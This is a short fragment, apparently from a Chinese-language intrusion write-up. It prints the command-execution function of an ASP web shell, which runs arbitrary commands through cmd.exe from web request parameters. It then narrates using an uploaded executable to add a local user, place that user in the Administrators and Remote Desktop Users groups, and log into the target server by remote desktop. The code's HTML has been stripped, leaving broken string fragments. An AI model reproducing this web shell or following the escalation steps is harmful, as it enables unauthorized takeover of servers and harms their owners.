Function CmdShell() If Request("SP")<>"" Then Session("ShellPath") = Request("SP") ShellPath=Session("ShellPath") if ShellPath="" Then ShellPath = "cmd.exe" if Request("wscript")="yes" then checked=" checked" else checked="" end if If Request("cmd")<>"" Then DefCmd = Request("cmd") SI="value='"&DefCmd&"'>value='运行'>" SI=SI&"" If Request.Form("cmd")<>"" Then if Request.Form("wscript")="yes" then Set CM=CreateObject(ObT(1,0)) Set DD=CM.exec(ShellPath&" /c "&DefCmd) aaa=DD.stdout.readall SI=SI&aaa else%>
Call ws.Run (ShellPath&" /c " & DefCmd & " > " & szTempFile, 0, True) Set fs = CreateObject("Scripting.FileSystemObject") Set oFilelcx = fs.OpenTextFile (szTempFile, 1, False, 0) aaa=Server.HTMLEncode(oFilelcx.ReadAll) oFilelcx.Close Call fso.DeleteFile(szTempFile, True) SI=SI&aaa end if End If SI=SI&chr(13)&"" SI=SI&"SHELL路径:value='"&ShellPath&"' Style='width:70%'> " SI=SI&"value='yes'"&checked&">WScript.Shell" Response.Write SI End Function
然后上传修改后的ftp2.exe,在wscript.shell中执行D:webftp2.exe “net user user password /add”后看看结果,已经成功添加了一个用户。再把该用户加入administrators组和“Remote desktop users”组后登陆了目标服务器的远程桌面。